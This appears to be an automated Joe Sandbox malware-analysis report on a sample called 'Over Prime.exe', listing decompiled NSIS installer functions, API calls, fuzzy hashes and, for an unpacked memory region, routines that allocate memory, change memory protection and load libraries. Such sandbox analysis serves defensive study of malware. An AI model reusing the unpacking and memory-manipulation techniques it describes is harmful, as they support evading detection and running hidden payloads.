Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction ID: 3364d2369d767f53e7c05e99e54cbc9c067443d5da9c9f227d7c3a258cba7bb7
Opcode Fuzzy Hash: a982ea5e0a4ecb993fc2e9b794e4afe077943b4b771bcbca33e5c7758572dd30
Instruction Fuzzy Hash: A9F08270702A20AFC2316F50FE4998B7F68FB44B56741447AF446B15ACCB380DA2CB9D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47
stringCOMMON

Download Yara Rule

C-Code - Quality: 53%

			E00405F14(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E0040653D(0x42fa70, _a4);
				_t21 = E00405EB7(0x42fa70);
				if(_t21 != 0) {
					E004067C4(_t21);
					if(( *0x434f18 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x42fa70 >> 1;
						while(1) {
							_t11 = lstrlenW(0x42fa70);
							_push(0x42fa70);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E00406873();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405E58(0x42fa70);
								continue;
							} else {
								goto L1;
							}
						}
						E00405E0C();
						return 0 | GetFileAttributesW(??) != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}

0x00405f20
0x00405f2b
0x00405f2f
0x00405f36
0x00405f42
0x00405f52
0x00405f54
0x00405f6c
0x00405f6d
0x00405f74
0x00405f75
0x00000000
0x00000000
0x00405f58
0x00405f5f
0x00405f67
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f5f
0x00405f77
0x00000000
0x00405f8b
0x00405f44
0x00405f4a
0x00000000
0x00000000
0x00000000
0x00000000
0x00405f4a
0x00405f31
0x00000000

APIs

Part of subcall function 0040653D: lstrcpynW.KERNEL32(?,?,00000400,0040369D,00433F00,NSIS Error), ref: 0040654A

Part of subcall function 00405EB7: CharNextW.USER32(?,?,0042FA70,?,00405F2B,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405EC5
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405ECA
Part of subcall function 00405EB7: CharNextW.USER32(00000000), ref: 00405EE2

lstrlenW.KERNEL32(0042FA70,00000000,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405F6D
GetFileAttributesW.KERNEL32(0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,0042FA70,00000000,0042FA70,0042FA70,75B53420,?,C:\Users\user\AppData\Local\Temp\,00405C69,?,75B53420,C:\Users\user\AppData\Local\Temp\), ref: 00405F7D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F14

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 3248276644-3355392842
Opcode ID: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction ID: e20fb510edeaf32ba19235dad054e15b0ffac27cf679254cac4fdbc394554759
Opcode Fuzzy Hash: 442e1b1d96b1c23b6c0207761c3788c7dd97485575ed4e88a223653099446a7a
Instruction Fuzzy Hash: E3F0F426119D6226DB22333A5C05EAF0554CE9276475A023BF895B12C5DB3C8A43D8AE

Uniqueness

Uniqueness Score: -1.00%

Function 00405513 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405513(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x42d254 != _t16) {
							_push(_t16);
							_push(6);
							 *0x42d254 = _t16;
							E00404ED4();
						}
						L11:
						return CallWindowProcW( *0x42d25c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404E54(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E004044E5(0x413);
				return 0;
			}

0x00405517
0x00405521
0x0040553d
0x0040555f
0x00405562
0x00405568
0x00405572
0x00405573
0x00405575
0x0040557b
0x0040557b
0x00405585
0x00000000
0x00405593
0x0040554a
0x00405582
0x00405582
0x00000000
0x00405582
0x00405556
0x00405558
0x00000000
0x00405558
0x00405527
0x00000000
0x00000000
0x0040552e
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00405542
CallWindowProcW.USER32(?,?,?,?), ref: 00405593

Part of subcall function 004044E5: SendMessageW.USER32(000F0080,00000000,00000000,00000000), ref: 004044F7

Strings

, xrefs: 00405523

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction ID: 904a7c61355239921aaa7855b64c86422fca6e8886f64d9e6fcbc6a993ea73ec
Opcode Fuzzy Hash: 0dea828d0dd479423763887dac230e90f27d8b8ae518018479b0ad82d517bb95
Instruction Fuzzy Hash: F3017CB1100608BFDF209F11DD80AAB3B27EB84754F50453AFA01762D5D77A8E92DA69

Uniqueness

Uniqueness Score: -1.00%

Function 0040640B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44
registryCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040640B(void* __ecx, void* __eflags, intOrPtr _a4, int _a8, short* _a12, char* _a16, signed int _a20) {
				int _v8;
				long _t21;
				long _t24;
				char* _t30;

				asm("sbb eax, eax");
				_v8 = 0x800;
				_t21 = E004063AA(__eflags, _a4, _a8,  ~_a20 & 0x00000100 | 0x00020019,  &_a20);
				_t30 = _a16;
				if(_t21 != 0) {
					L4:
					 *_t30 =  *_t30 & 0x00000000;
				} else {
					_t24 = RegQueryValueExW(_a20, _a12, 0,  &_a8, _t30,  &_v8);
					_t21 = RegCloseKey(_a20);
					_t30[0x7fe] = _t30[0x7fe] & 0x00000000;
					if(_t24 != 0 || _a8 != 1 && _a8 != 2) {
						goto L4;
					}
				}
				return _t21;
			}

0x00406419
0x0040641b
0x00406433
0x00406438
0x0040643d
0x0040647b
0x0040647b
0x0040643f
0x00406451
0x0040645c
0x00406462
0x0040646d
0x00000000
0x00000000
0x0040646d
0x00406481

APIs

RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000800,00000000,?,00000000,?,?,Call,?,?,00406672,80000002), ref: 00406451
RegCloseKey.ADVAPI32(?,?,00406672,80000002,Software\Microsoft\Windows\CurrentVersion,Call,Call,Call,00000000,Skipped: C:\Users\user\AppData\Local\Temp\nse70B.tmp\System.dll), ref: 0040645C

Strings

Call, xrefs: 00406412

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CloseQueryValue
String ID: Call
API String ID: 3356406503-1824292864
Opcode ID: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
Instruction ID: a8d415a3dc4e4479eaaa65942f717852bb8bd3539c12dad3b2e52d491ce509ba
Opcode Fuzzy Hash: a598e195228f1036644e08b1753da052d1713cd74bd9ea8ab147b12b545f69e3
Instruction Fuzzy Hash: FB017C72510209AADF21CF51CC09EDB3BB8FB54364F01803AFD5AA6190D738D968DBA8

Uniqueness

Uniqueness Score: -1.00%

Function 00403B57 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403B57() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42b22c;
				_t3 = E00403B3C(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42b22c =  *0x42b22c & 0x00000000;
				return _t3;
			}

0x00403b58
0x00403b60
0x00403b67
0x00403b6a
0x00403b6a
0x00403b6c
0x00403b71
0x00403b78
0x00403b7e
0x00403b82
0x00403b83
0x00403b8b

APIs

FreeLibrary.KERNEL32(?,75B53420,00000000,C:\Users\user\AppData\Local\Temp\,00403B2F,00403A5E,?), ref: 00403B71
GlobalFree.KERNEL32(?), ref: 00403B78

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403B57

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3355392842
Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC

Uniqueness

Uniqueness Score: -1.00%

Function 00405F92 Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x00405fa2
0x00405fa4
0x00405fa7
0x00405fd3
0x00405fac
0x00405fb5
0x00405fba
0x00405fc5
0x00405fc8
0x00405fe4
0x00405fca
0x00405fd1
0x00000000
0x00405fd1
0x00405fdd
0x00405fe1
0x00405fe1
0x00405fdb
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FBA
CharNextA.USER32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FCB
lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: Over Prime.exePID: 396, Parent PID: 8260COMMON

Execution Graph

Execution Coverage:	2%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	100
Total number of Limit Nodes:	5

Executed Functions

Function 016720CB Relevance: 3.3, APIs: 2, Instructions: 285
memorynativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01675211: LoadLibraryA.KERNEL32(?,00000000,?,016754B0,?), ref: 0167149E

NtAllocateVirtualMemory.NTDLL(-6C6B2C72), ref: 016723A6

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID: AllocateLibraryLoadMemoryVirtual
String ID:
API String ID: 2616484454-0
Opcode ID: 65145b849ebce938a73475dcf74561134b81da502b561f43f697652d9d39d722
Instruction ID: cc8e28b697c72521b475c5610fe409c3a58eb446c624c8411f537d5c43fbe3b2
Opcode Fuzzy Hash: 65145b849ebce938a73475dcf74561134b81da502b561f43f697652d9d39d722
Instruction Fuzzy Hash: A2917C7560434A8FEF359E28CDA47EB3763AF563B0F84822EDC4A8B385D73189418B41

Uniqueness

Uniqueness Score: -1.00%

Function 0167097A Relevance: 3.2, APIs: 2, Instructions: 156
filelibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,2798DC39,00216417), ref: 01670B2B
LoadLibraryA.KERNEL32(?,00000000,?,016754B0,?), ref: 0167149E

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID: CreateFileLibraryLoad
String ID:
API String ID: 2049390123-0
Opcode ID: dfaae555cbe52bd59d907773066635be4c66d93abf56b30567137c5f46c74d4d
Instruction ID: 65781b8376097bbd3726dbab6fa3c10649ad5436e680bc31dfb4dc219d9477de
Opcode Fuzzy Hash: dfaae555cbe52bd59d907773066635be4c66d93abf56b30567137c5f46c74d4d
Instruction Fuzzy Hash: AB5159755043058FCF356E288DA47EE3B67AF96370F91812EEC8A9B605D73149428642

Uniqueness

Uniqueness Score: -1.00%

Function 0166518E Relevance: 1.7, APIs: 1, Instructions: 248
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,?,016754B0,?), ref: 0167149E

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1efd8f52e62016d15fedc77b2f245f53a78f84efa0e319bc902fa45b5e084d1e
Instruction ID: c6378f1e4a7d20522de307a232290d3b4eff2ceeadd24728ec7c0357f9b9e0cb
Opcode Fuzzy Hash: 1efd8f52e62016d15fedc77b2f245f53a78f84efa0e319bc902fa45b5e084d1e
Instruction Fuzzy Hash: 49814975B043459FDF359E288DA47EE37A7EF96360F95812EDC8A9B204D7704982CB02

Uniqueness

Uniqueness Score: -1.00%

Function 01672EEF Relevance: 1.7, APIs: 1, Instructions: 212
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,?,016754B0,?), ref: 0167149E

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 2d3e7db7bb17e1d699d78126b798c1be59aaea894100f98db89e68d466622635
Instruction ID: 24ff1ea0e68d9ec2519b76280489ac23cc7ae6390666346ec7bee8e94f514006
Opcode Fuzzy Hash: 2d3e7db7bb17e1d699d78126b798c1be59aaea894100f98db89e68d466622635
Instruction Fuzzy Hash: 9D5189716003499FDF395E688DA53FA37639F92360FA1812FDC879B205D7700986CA02

Uniqueness

Uniqueness Score: -1.00%

Function 016650BB Relevance: 1.6, APIs: 1, Instructions: 50
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(1AA25CCC), ref: 016650CD

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 7da09d9953bbfed3d7cc9a976c1a08c86386e22ff89921257db9b6fee20a680a
Instruction ID: f36085ee06b500867061a5b4de5db1e178fab6ce0654acc2a9f819cad514198d
Opcode Fuzzy Hash: 7da09d9953bbfed3d7cc9a976c1a08c86386e22ff89921257db9b6fee20a680a
Instruction Fuzzy Hash: F701F91020879B9DE7394E3C9EB87D71B96DF463E0F50032ACCABCB9C6E7214942C202

Uniqueness

Uniqueness Score: -1.00%

Function 0166505D Relevance: 1.5, APIs: 1, Instructions: 46
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(1AA25CCC), ref: 016650CD

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 2ebb7c71546e66a7a3f505fa122342b453a5e07ba67c96bc4c8ae1f1d6a4f504
Instruction ID: b2bdc952be54aba81e68449ef303e7c2c42b3ebc8b7084757585146d00103a40
Opcode Fuzzy Hash: 2ebb7c71546e66a7a3f505fa122342b453a5e07ba67c96bc4c8ae1f1d6a4f504
Instruction Fuzzy Hash: 6101D81010879B99E7295E3C9AB87D72B969F473E0F54022ACCAACB9C6E72149428601

Uniqueness

Uniqueness Score: -1.00%

Function 016742A1 Relevance: 1.5, APIs: 1, Instructions: 44
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtProtectVirtualMemory.NTDLL(-15BC6E28,?,?,?,?,016732FF), ref: 01674363

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID: MemoryProtectVirtual
String ID:
API String ID: 2706961497-0
Opcode ID: 57d6a153e28e55f7020933cbf1e774a986049f13a81e890a24e058aa9cd054ae
Instruction ID: 15e430cb8c76548dca204547cfbb68aea3f143a0399f1b710cd6eefc36d71790
Opcode Fuzzy Hash: 57d6a153e28e55f7020933cbf1e774a986049f13a81e890a24e058aa9cd054ae
Instruction Fuzzy Hash: 0C017170754388DFDB38CE68DCA8BEA3796BFE9304F40412DDD4A9B345DB315A458614

Uniqueness

Uniqueness Score: -1.00%

Function 01665822 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 123
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,?,016754B0,?), ref: 0167149E

Strings

AAbh, xrefs: 016658E0

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID: AAbh
API String ID: 1029625771-1729554428
Opcode ID: 3261a167221967de3953847f09773837e141c25eafe56f78fdbafe999036d28f
Instruction ID: 063a207f6383877e37be20bbf1f9cff13baa2fd8efe30432cdf05e9bf18f1ea3
Opcode Fuzzy Hash: 3261a167221967de3953847f09773837e141c25eafe56f78fdbafe999036d28f
Instruction Fuzzy Hash: F9414AB5A043158FDB319E698D547EF37A7AF96360F94C12EDC45DB208D37049828B51

Uniqueness

Uniqueness Score: -1.00%

Function 01670E69 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35931da7f7d91c89f5179219889272d8a67d1057a585839d9d4b975bc1ca38f8
Instruction ID: edbc96c80ebd18cc801ecce45ebdd47df865473004a2efce5ca31cf0a1b1be4b
Opcode Fuzzy Hash: 35931da7f7d91c89f5179219889272d8a67d1057a585839d9d4b975bc1ca38f8
Instruction Fuzzy Hash: 3C516A74A003469FCB359F28CD957EA37A7EF56360F94812EED4A9B305D7708A81C700

Uniqueness

Uniqueness Score: -1.00%

Function 0166951B Relevance: 1.6, APIs: 1, Instructions: 137
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,?,016754B0,?), ref: 0167149E

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 61a180551d5412620b0d24f3c7935307a9b2f5a543624680d3886e4a7c455966
Instruction ID: 7efc2073107e4655cf5c9a5aa6dd358992d4cf4511e28a240e787ee76068a28a
Opcode Fuzzy Hash: 61a180551d5412620b0d24f3c7935307a9b2f5a543624680d3886e4a7c455966
Instruction Fuzzy Hash: DA416B79A043069EDF32AE6C8D446EE3B579F93370FA0C22ADC099B21AD7714542C641

Uniqueness

Uniqueness Score: -1.00%

Function 01675211 Relevance: 1.6, APIs: 1, Instructions: 128
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,?,016754B0,?), ref: 0167149E

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 4f903890cb32da2d0137335912491ed2d9b5ee5062887f280044934f7f2b8432
Instruction ID: 9e121a749f42693e31ae73954dd7be163e1b40a43beff5958c5ec26b43064291
Opcode Fuzzy Hash: 4f903890cb32da2d0137335912491ed2d9b5ee5062887f280044934f7f2b8432
Instruction Fuzzy Hash: C93159766043048FDB269E289D943EA2B679FD7270F60C22FDC568B399D7708A028701

Uniqueness

Uniqueness Score: -1.00%

Function 0166649A Relevance: 1.6, APIs: 1, Instructions: 121
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(?,00000000,?,016754B0,?), ref: 0167149E

Memory Dump Source

Source File: 00000003.00000002.976575832.0000000001660000.00000040.00000400.00020000.00000000.sdmp, Offset: 01660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1660000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 952c90397c857575819aa70238809922d3f2f2cdf68e37acdf30d70a497628a1
Instruction ID: d831bd6b98dbbf635f0bf4fda3444802193b94241a1b8dbd8973303bf9395be7
Opcode Fuzzy Hash: 952c90397c857575819aa70238809922d3f2f2cdf68e37acdf30d70a497628a1
Instruction Fuzzy Hash: 134138B8A047058FCF34AE6C9D647EE3B67AFD6360F50812EDC899B209D33149439B16

Uniqueness

Uniqueness Score: -1.00%

